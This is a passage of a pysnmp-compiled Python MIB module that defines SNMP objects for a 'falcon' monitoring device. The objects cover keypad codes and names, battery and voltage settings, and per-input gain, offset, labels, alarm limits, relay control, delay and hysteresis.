falconKeypadName8 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 16), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName8.setStatus('mandatory')
falconKeypadCode9 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 17), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode9.setStatus('mandatory')
falconKeypadName9 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 18), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName9.setStatus('mandatory')
falconKeypadCode10 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 19), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode10.setStatus('mandatory')
falconKeypadName10 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 20), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName10.setStatus('mandatory')
falconKeypadCode11 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 21), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode11.setStatus('mandatory')
falconKeypadName11 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 22), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName11.setStatus('mandatory')
falconKeypadCode12 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 23), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode12.setStatus('mandatory')
falconKeypadName12 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 24), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName12.setStatus('mandatory')
falconKeypadCode13 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 25), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode13.setStatus('mandatory')
falconKeypadName13 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 26), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName13.setStatus('mandatory')
falconKeypadCode14 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 27), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode14.setStatus('mandatory')
falconKeypadName14 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 28), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName14.setStatus('mandatory')
falconKeypadCode15 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 29), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode15.setStatus('mandatory')
falconKeypadName15 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 30), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName15.setStatus('mandatory')
falconKeypadCode16 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 31), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode16.setStatus('mandatory')
falconKeypadName16 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 32), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName16.setStatus('mandatory')
falconKeypadCode17 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 33), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode17.setStatus('mandatory')
falconKeypadName17 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 34), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName17.setStatus('mandatory')
falconKeypadCode18 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 35), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode18.setStatus('mandatory')
falconKeypadName18 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 36), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName18.setStatus('mandatory')
falconKeypadCode19 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 37), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode19.setStatus('mandatory')
falconKeypadName19 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 38), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName19.setStatus('mandatory')
falconKeypadCode20 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 39), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode20.setStatus('mandatory')
falconKeypadName20 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 40), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName20.setStatus('mandatory')
falconInputVoltage = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInputVoltage.setStatus('mandatory')
falconOnBattery = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("notInstalled", 0), ("installed", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconOnBattery.setStatus('mandatory')
falconLowBatteryThreshold = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconLowBatteryThreshold.setStatus('mandatory')
falconAnalogAverage = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 60))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconAnalogAverage.setStatus('mandatory')
falconInputs = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3))
falconInput1 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1))
falconInput1State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notinstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1State.setStatus('mandatory')
falconInput1Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput1Reading.setStatus('mandatory')
falconInput1Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Gain.setStatus('mandatory')
falconInput1Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Offset.setStatus('mandatory')
falconInput1Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Label.setStatus('mandatory')
falconInput1UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1UOM.setStatus('mandatory')
falconInput1HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1HighLimit2.setStatus('mandatory')
falconInput1HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1HighLimit.setStatus('mandatory')
falconInput1LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1LowLimit.setStatus('mandatory')
falconInput1LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1LowLimit2.setStatus('mandatory')
falconInput1RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1RlyControl.setStatus('mandatory')
falconInput1Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Delay.setStatus('mandatory')
falconInput1Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Hysteresis.setStatus('mandatory')
falconInput2 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2))
falconInput2State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notinstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2State.setStatus('mandatory')
falconInput2Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput2Reading.setStatus('mandatory')
falconInput2Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Gain.setStatus('mandatory')
falconInput2Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Offset.setStatus('mandatory')
falconInput2Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Label.setStatus('mandatory')
falconInput2UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2UOM.setStatus('mandatory')
falconInput2HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2HighLimit2.setStatus('mandatory')
falconInput2HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2HighLimit.setStatus('mandatory')
falconInput2LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2LowLimit.setStatus('mandatory')
falconInput2LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2LowLimit2.setStatus('mandatory')
falconInput2RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2RlyControl.setStatus('mandatory')
falconInput2Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Delay.setStatus('mandatory')
falconInput2Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Hysteresis.setStatus('mandatory')
falconInput3 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3))
falconInput3State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3State.setStatus('mandatory')
falconInput3Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput3Reading.setStatus('mandatory')
falconInput3Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Gain.setStatus('mandatory')
falconInput3Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Offset.setStatus('mandatory')
falconInput3Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Label.setStatus('mandatory')
falconInput3UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3UOM.setStatus('mandatory')
falconInput3HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3HighLimit2.setStatus('mandatory')
falconInput3HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3HighLimit.setStatus('mandatory')
falconInput3LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3LowLimit.setStatus('mandatory')
falconInput3LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3LowLimit2.setStatus('mandatory')
falconInput3RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3RlyControl.setStatus('mandatory')
falconInput3Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Delay.setStatus('mandatory')
falconInput3Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Hysteresis.setStatus('mandatory')
falconInput4 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4))
falconInput4State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4State.setStatus('mandatory')
falconInput4Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput4Reading.setStatus('mandatory')
falconInput4Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Gain.setStatus('mandatory')
falconInput4Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Offset.setStatus('mandatory')
falconInput4Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Label.setStatus('mandatory')
falconInput4UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4UOM.setStatus('mandatory')
falconInput4HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4HighLimit2.setStatus('mandatory')
falconInput4HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4HighLimit.setStatus('mandatory')
falconInput4LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4LowLimit.setStatus('mandatory')
falconInput4LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4LowLimit2.setStatus('mandatory')
falconInput4RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4RlyControl.setStatus('mandatory')
falconInput4Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Delay.setStatus('mandatory')
falconInput4Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Hysteresis.setStatus('mandatory')
falconInput5 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5))
falconInput5State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5State.setStatus('mandatory')
falconInput5Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput5Reading.setStatus('mandatory')
falconInput5Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Gain.setStatus('mandatory')
falconInput5Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Offset.setStatus('mandatory')
falconInput5Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Label.setStatus('mandatory')
falconInput5UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5UOM.setStatus('mandatory')
falconInput5HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5HighLimit2.setStatus('mandatory')
falconInput5HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5HighLimit.setStatus('mandatory')
falconInput5LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5LowLimit.setStatus('mandatory')
falconInput5LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5LowLimit2.setStatus('mandatory')
falconInput5RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5RlyControl.setStatus('mandatory')
falconInput5Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Delay.setStatus('mandatory')
falconInput5Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Hysteresis.setStatus('mandatory')
falconInput6 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6))
falconInput6State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6State.setStatus('mandatory')
falconInput6Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput6Reading.setStatus('mandatory')
falconInput6Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Gain.setStatus('mandatory')
# --- falconInput6 (universal input, subtree ...3184.1.1.1.3.6) -------------
# pysnmp-compiled MIB scalars. Calibration offset for the input reading.
falconInput6Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Offset.setStatus('mandatory')
# Free-form display name and unit-of-measure strings for this input.
falconInput6Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Label.setStatus('mandatory')
falconInput6UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6UOM.setStatus('mandatory')
# Two-stage high/low alarm thresholds (sub-ids 7-10).
falconInput6HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6HighLimit2.setStatus('mandatory')
falconInput6HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6HighLimit.setStatus('mandatory')
falconInput6LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6LowLimit.setStatus('mandatory')
falconInput6LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6LowLimit2.setStatus('mandatory')
# Relay-control bitmask, alarm delay (0-600, presumably seconds — TODO
# confirm against vendor MIB) and hysteresis for threshold alarms.
falconInput6RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6RlyControl.setStatus('mandatory')
